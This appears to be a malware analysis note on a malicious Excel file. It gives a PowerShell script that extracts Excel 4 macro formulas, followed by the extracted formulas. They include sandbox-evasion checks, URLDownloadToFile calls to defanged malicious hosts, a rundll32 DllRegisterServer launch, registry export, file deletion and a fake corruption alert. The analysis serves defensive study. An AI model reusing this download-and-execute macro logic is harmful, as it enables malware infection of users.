VT Link: https://www.virustotal.com/gui/file/d9f00024784af858627a44731950ccb50fe3f37bf940ed47ae7b1ca35ac5ceff/detection
SHA256: D9F00024784AF858627A44731950CCB50FE3F37BF940ED47AE7B1CA35AC5CEFF
File Name: 2aKqjPrdo1-7192.xls
The following code was used to extract Excel 4 formula (i.e. executable code) content:
$XLSPath = 'C:\Users\TestUser\Desktop\2aKqjPrdo1-7192.xls'
# Load the Excel COM class so that we can programmatically inspect the spreadsheet
$Excel = New-Object -ComObject 'Excel.Application'
# Open the suspicious spreadsheet
$WorkBook = $Excel.Workbooks.Open($XLSPath)
# See if there are any Excel 4 sheets. To support Excel 4 macros, there must be at least one dedicated sheet.
$WorkBook.Excel4MacroSheets
# There was one Excel 4 sheet. Pull it out by name - "Sheet2".
$Excel4MacroSheet = $WorkBook.Excel4MacroSheets.Item('Sheet2')
# Because the populated cells are spread out so much, get the row/column of the last populated cell. "11" corresponds to the last cell.
$LastCell = $Excel4MacroSheet.Cells.SpecialCells(11)
# Get the range of all populated cells
$AllUsedCells = $Excel4MacroSheet.Range($Excel4MacroSheet.Cells(1,1), $LastCell)
# We're going to save cells that have formula content here.
$CellArray = New-Object -TypeName 'System.Collections.Generic.List`1[Object]'
# Find any cell that has a formula in it - i.e. executable Excel 4 macro content
$PopulatedCell = $AllUsedCells.Find('=*')
# Save the row/column of the first found cell so that we can break out of a find loop.
$FirstRow = $PopulatedCell.Row
$FirstColumn = $PopulatedCell.Column
# Find all cells with formulas defined
do {
$CellArray.Add($PopulatedCell)
$PopulatedCell = $PopulatedCell.Find('=*')
} while (-not (($PopulatedCell.Row -eq $FirstRow) -and ($PopulatedCell.Column -eq $FirstColumn)))
# Extract and display the name of the first cell that will execute.
$AutoOpenCell = $CellArray | ? { $_.Name -and $_.Name.Name.StartsWith('Auto') }
$AutoOpenCell.Name.Name
# View the contents of all the defined formulas
$CellArray.Formula
$WorkBook.Close()
$Excel.Quit()="C:\Users\Public\hhg59VX.html"
="C:\Users\Public\hJKn4Y.reg"
="C:\Users\Public\yOjW.html"
="C:\Windows\system32\reg.exe"
="C:\Windows\system32\rundll32.exe"
="EXPORT HKCU\Software\Microsoft\Office\"
="hXXp://almakaaseb[.]com/wp-content/uploads/2020/05/wp-front.php"
="https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
="hXXps://neebank[.]com/wp-content/uploads/2020/05/wp-front.php"
="The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
=ALERT(IP28226)
=APP.MAXIMIZE()
=AQ14844&GET.WORKSPACE(2)&"\Excel\Security "&DJ57521&" /y"
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",FQ16297,AV63127,0,5)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",IC4780,DB44363,0,5)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,BI63752,GB7473,0,0)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,CR50301,V56104,0,0)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,GD29405,V56104,0,0)
=CLOSE(FALSE)
=FCLOSE(H41269)
=FILE.DELETE(DJ57521)
=FILES(GB7473)
=FILES(V56104)
=FOPEN(DJ57521)
=FPOS(H41269,215)
=FREAD(H41269,255)
=IF(GET.WINDOW(20),,GOTO(BR26512))
=IF(GET.WINDOW(23)<3,GOTO(BR26512),)
=IF(GET.WINDOW(7),GOTO(BR26512),)
=IF(GET.WORKSPACE(13)<770,GOTO(BR26512),)
=IF(GET.WORKSPACE(14)<390,GOTO(BR26512),)
=IF(GET.WORKSPACE(19),,GOTO(BR26512))
=IF(GET.WORKSPACE(31),GOTO(BR26512),)
=IF(GET.WORKSPACE(42),,GOTO(BR26512))
=IF(ISERROR(CD64101),GOTO(BR26512),)
=IF(ISERROR(IO65223),,RUN(EC47222))
=IF(ISNUMBER(SEARCH("0001",HP8602)),GOTO(BR26512),)
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(BR26512))
=NEXT()
=V56104&",DllRegisterServer"
=WAIT(NOW()+"00:00:01")
=WHILE(ISERROR(FILES(DJ57521)))